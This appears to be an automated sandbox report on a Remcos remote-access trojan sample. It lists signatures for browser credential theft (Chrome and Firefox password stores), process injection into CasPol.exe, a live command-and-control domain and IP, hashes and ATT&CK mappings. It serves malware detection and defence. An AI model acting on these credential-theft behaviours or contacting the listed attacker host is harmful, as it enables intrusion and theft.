          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,6_2_00451F9B
          Source: C:\Users\user\Desktop\C1ZsNxSer8.exeCode function: 1_2_00007FF774A6955C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00007FF774A6955C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_0041B60D GetComputerNameExW,GetUserNameW,6_2_0041B60D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_2_00449190
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 6_2_0040BA12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 6_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \key3.db 6_2_0040BB30

Remote Access Functionality

Source: Yara match | File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.C1ZsNxSer8.exe.145bfbc3ae0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.C1ZsNxSer8.exe.145bf964228.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: C1ZsNxSer8.exe PID: 3432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 6780, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: cmd.exe 6_2_0040569A
MITRE ATT&CK Matrix (flattened in the extracted page; regrouped here by tactic column). The digits in front of a technique are the report's count badges, reproduced as printed; techniques without a number had no matching signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Native API; 1 Command and Scripting Interpreter; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 1 Windows Service; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 322 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 2 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 322 Process Injection; Dynamic API Resolution
Credential Access: 1 OS Credential Dumping; 111 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 2 File and Directory Discovery; 24 System Information Discovery; 21 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 111 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 12 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Source | Detection | Scanner | Label | Link
C1ZsNxSer8.exe | 24% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe |
https://aka.ms/nativeaot-compatibility | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpSystem32 | 0% | Avira URL Cloud | safe |
https://aka.ms/GlobalizationInvariantMode | 0% | Avira URL Cloud | safe |
unifrieghtmovers.com | 0% | Avira URL Cloud | safe |
https://aka.ms/nativeaot-compatibilityX | 0% | Avira URL Cloud | safe |
https://aka.ms/nativeaot-compatibilityY | 0% | Avira URL Cloud | safe |
https://aka.ms/nativeaot-c | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gpl | 0% | Avira URL Cloud | safe |
http://geoplugin.net/json.gp- | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | unknown
unifrieghtmovers.com | 23.95.60.82 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
unifrieghtmovers.com | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/GlobalizationInvariantMode | C1ZsNxSer8.exe | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | C1ZsNxSer8.exe, 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, CasPol.exe, 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpl | CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/nativeaot-c | C1ZsNxSer8.exe | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpSystem32 | CasPol.exe, 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/nativeaot-compatibility | C1ZsNxSer8.exe | false | Avira URL Cloud: safe | unknown
https://aka.ms/nativeaot-compatibilityY | C1ZsNxSer8.exe | false | Avira URL Cloud: safe | unknown
https://aka.ms/nativeaot-compatibilityy | C1ZsNxSer8.exe | false | | unknown
https://aka.ms/nativeaot-compatibilityX | C1ZsNxSer8.exe, 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp- | CasPol.exe, 00000006.00000002.3738453046.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
23.95.60.82 | unifrieghtmovers.com | United States | 36352 | AS-COLOCROSSINGUS | true
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1482895
                Start date and time:2024-07-26 10:37:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 52s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:C1ZsNxSer8.exe
                renamed because original name is a hash value
                Original Sample Name:4fb3e6e7b8f9c12cd2d5e161f7b94760.exe
                Detection:MAL
                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@4/1@2/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 57%
                • Number of executed functions: 60
                • Number of non-executed functions: 231
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: C1ZsNxSer8.exe
Time | Type | Description
06:21:01 | API Interceptor | 5458638x Sleep call for process: CasPol.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
178.237.33.50 | Quotation.xls | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | LisectAVT_2403002A_101.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | LisectAVT_2403002A_407.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | LisectAVT_2403002A_431.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | IAENMAIL-A4-240717-0830-000090912_PDF.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | CDG__ Copia de Pagamento.pdf.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | CFS-0682-2-08 Order.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | remcos.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | ogetback.doc | malicious | Remcos | geoplugin.net/json.gp
23.95.60.82 | Quotation.xls | malicious | Remcos |
23.95.60.82 | QUOTATION#06232024.exe | malicious | Remcos |
23.95.60.82 | RFQ00978-Abu Dhabi Hardware.exe | malicious | Remcos |
23.95.60.82 | PO#BR23-67981-BIO.exe | malicious | Remcos |
23.95.60.82 | MACHINE QUOTATION.exe | malicious | Remcos |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | Quotation.xls | malicious | Remcos | 178.237.33.50
geoplugin.net | LisectAVT_2403002A_101.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | LisectAVT_2403002A_407.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | LisectAVT_2403002A_431.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | IAENMAIL-A4-240717-0830-000090912_PDF.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | CDG__ Copia de Pagamento.pdf.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | CFS-0682-2-08 Order.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | remcos.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | ogetback.doc | malicious | Remcos | 178.237.33.50
unifrieghtmovers.com | Quotation.xls | malicious | Remcos | 23.95.60.82
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | Quotation.xls | malicious | Remcos | 23.95.60.82
AS-COLOCROSSINGUS | #U00d6DEME TAVS#U0130YES#U0130.xls | malicious | Remcos | 198.46.176.133
AS-COLOCROSSINGUS | BilseMHALF.rtf | malicious | Unknown | 172.245.123.11
AS-COLOCROSSINGUS | 2FBexXRCHR.rtf | malicious | AgentTesla | 198.46.174.139
AS-COLOCROSSINGUS | DBytisGNuD.exe | malicious | CobaltStrike, Metasploit | 107.174.69.116
AS-COLOCROSSINGUS | LisectAVT_2403002A_101.exe | malicious | Remcos | 107.175.229.139
AS-COLOCROSSINGUS | LisectAVT_2403002A_111.exe | malicious | Trickbot | 108.174.60.238
AS-COLOCROSSINGUS | 042240724.xls | malicious | Remcos | 198.46.176.133
AS-COLOCROSSINGUS | LisectAVT_2403002A_407.exe | malicious | Remcos | 107.175.229.139
AS-COLOCROSSINGUS | LisectAVT_2403002A_431.exe | malicious | Remcos | 107.175.229.139
ATOM86-ASATOM86NL | Quotation.xls | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | LisectAVT_2403002A_101.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | LisectAVT_2403002A_407.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | LisectAVT_2403002A_431.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | IAENMAIL-A4-240717-0830-000090912_PDF.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | CDG__ Copia de Pagamento.pdf.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | CFS-0682-2-08 Order.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | remcos.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | ogetback.doc | malicious | Remcos | 178.237.33.50
                          No context
                          No context
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):962
                          Entropy (8bit):5.013130376969173
                          Encrypted:false
                          SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                          MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                          SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                          SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                          SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                          Entropy (8bit):7.219441527091625
                          TrID:
                          • Win64 Executable GUI Net Framework (217006/5) 49.88%
                          • Win64 Executable GUI (202006/5) 46.43%
                          • Win64 Executable (generic) (12005/4) 2.76%
                          • Generic Win/DOS Executable (2004/3) 0.46%
                          • DOS Executable Generic (2002/1) 0.46%
                          File name:C1ZsNxSer8.exe
                          File size:2'673'152 bytes
                          MD5:4fb3e6e7b8f9c12cd2d5e161f7b94760
                          SHA1:57bdad62c6ea7f1b905c900302f918d185811a94
                          SHA256:f76f9b85df2ba8850bec058164d2c752c8fd8ef0f1bcffd793e5f453d8a839bb
                          SHA512:f762ad1ccd537d06c1cf3538e433671f441f100b06d37ec34b3a3e76dfbfad40ac7ca50ee32297c54f628b0b89d75c2c5255166cc992f9bcff8f117f70aa179a
                          SSDEEP:49152:Og7eO7kjTav5AwVZGsY3uS+s1vm1lvt+vU0JSziMwqM:j7lmmUM7wq
                          TLSH:E5C5C015E3E802A5D47BD630CE699733D3B1B8591734D68B0A4DD6862FB3A918B3F312
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$n.K$n.K$n.K...J-n.K...J(n.K...J.n.K-.*K*n.Ko..J-n.K$n.K.n.K...J/n.K...J`n.K$n.K%n.K7..J%n.K7.FK%n.K7..J%n.KRich$n.K.......
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x140068ec0
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66A2D06D [Thu Jul 25 22:23:41 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:fa79c8f1c618648f2275daa90f4c6120
Instruction: entrypoint disassembly listing omitted.
                          Programming Language:
                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x25ddf0 | 0x58 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25de48 | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x283000 | 0x793a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x26f000 | 0x138d8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2fd000 | 0x63c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x22fd50 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x22ff80 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x22fc10 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x19b000 | 0x730 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x71068 | 0x71200 | 705ee70f681712f037648f64f7ff349b | False | 0.45604713397790053 | data | 6.628875011573696 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed | 0x73000 | 0xc71b8 | 0xc7200 | 1a9720d8f2052361ee72792911e2998c | False | 0.4527093632297552 | data | 6.455888936505785 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated | 0x13b000 | 0x5f760 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x19b000 | 0xc4826 | 0xc4a00 | de8c4f61c1eab85a14c0763f552e6870 | False | 0.46696946519389704 | data | 6.832386028543998 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x260000 | 0xe910 | 0x2200 | 8fd33c392153ba6b562bd43642981136 | False | 0.24126838235294118 | data | 3.707086596297386 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x26f000 | 0x138d8 | 0x13a00 | 085ea66cfd1057997a6929925deeaa33 | False | 0.488953025477707 | data | 6.138192127218323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x283000 | 0x793a0 | 0x79400 | e02bb51fe05dba7eb1ae6d6db1fec95c | False | 0.9982945393041237 | data | 7.999346124339988 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2fd000 | 0x63c | 0x800 | cca946f892ab4486af2246e58222b961 | False | 0.4814453125 | data | 4.783243091845513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
BINARY | 0x283118 | 0x78c84 | data | | | 1.0003254339793501
RT_VERSION | 0x2fbd9c | 0x418 | data | | | 0.3234732824427481
RT_MANIFEST | 0x2fc1b4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
ADVAPI32.dll | RegCloseKey, RegEnumValueW, RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteValueW, RegEnumKeyExW, RegFlushKey, RegQueryInfoKeyW, RegSetValueExW, CreateWellKnownSid, GetWindowsAccountDomainSid, LookupPrivilegeValueW, RevertToSelf, OpenThreadToken, OpenProcessToken, SetThreadToken, AdjustTokenPrivileges, DuplicateTokenEx, GetSecurityDescriptorLength, EventWrite, EventRegister, EventEnabled
bcrypt.dll | BCryptGenRandom, BCryptEncrypt, BCryptDecrypt, BCryptImportKey, BCryptOpenAlgorithmProvider, BCryptCloseAlgorithmProvider, BCryptDestroyKey, BCryptSetProperty
KERNEL32.dll | TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, RtlPcToFileHeader, CloseThreadpoolIo, GetStdHandle, FileTimeToSystemTime, SystemTimeToFileTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetTickCount64, GetCurrentProcess, GetCurrentThread, Sleep, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, WaitForMultipleObjectsEx, GetLastError, QueryPerformanceFrequency, SetLastError, GetFullPathNameW, GetLongPathNameW, MultiByteToWideChar, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CopyFileExW, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, WriteFile, GetCurrentProcessorNumberEx, CloseHandle, SetEvent, ResetEvent, CreateEventExW, GetEnvironmentVariableW, FormatMessageW, DuplicateHandle, GetThreadPriority, SetThreadPriority, CreateProcessA, GetConsoleWindow, GetModuleHandleA, FreeConsole, AllocConsole, CreateProcessW, GetThreadContext, ExitProcess, FlushProcessWriteBuffers, GetCurrentThreadId, WaitForSingleObjectEx, VirtualQuery, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, SuspendThread, ResumeThread, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, InitializeSListHead, GetCurrentProcessId
ole32.dll | CoUninitialize, CoTaskMemAlloc, CoGetApartmentType, CoCreateGuid, CoTaskMemFree, CoWaitForMultipleHandles, CoInitializeEx
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr, ceil
api-ms-win-crt-heap-l1-1-0.dll | calloc, free, _callnewh, _set_new_mode, malloc
api-ms-win-crt-string-l1-1-0.dll | wcsncmp, strncpy_s, _stricmp, strcpy_s, strcmp, _wcsicmp
api-ms-win-crt-runtime-l1-1-0.dll | _c_exit, _register_thread_local_exe_atexit_callback, _get_initial_wide_environment, _cexit, __p___wargv, __p___argc, _exit, exit, _initterm_e, _initterm, terminate, _crt_atexit, _initialize_wide_environment, _register_onexit_function, _initialize_onexit_table, _configure_wide_argv, _set_app_type, _seh_filter_exe, abort
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsprintf_s, __stdio_common_vsscanf, __stdio_common_vfprintf, __acrt_iob_func, _set_fmode, __p__commode
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Name | Ordinal | Address
DotNetRuntimeDebugHeader | 1 | 0x140261360
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T10:38:04.959198+0200 | TCP | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 49701 | 2558 | 192.168.2.7 | 23.95.60.82
2024-07-26T10:39:05.833265+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49708 | 40.68.123.157 | 192.168.2.7
2024-07-26T10:38:06.927784+0200 | TCP | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 49702 | 80 | 192.168.2.7 | 178.237.33.50
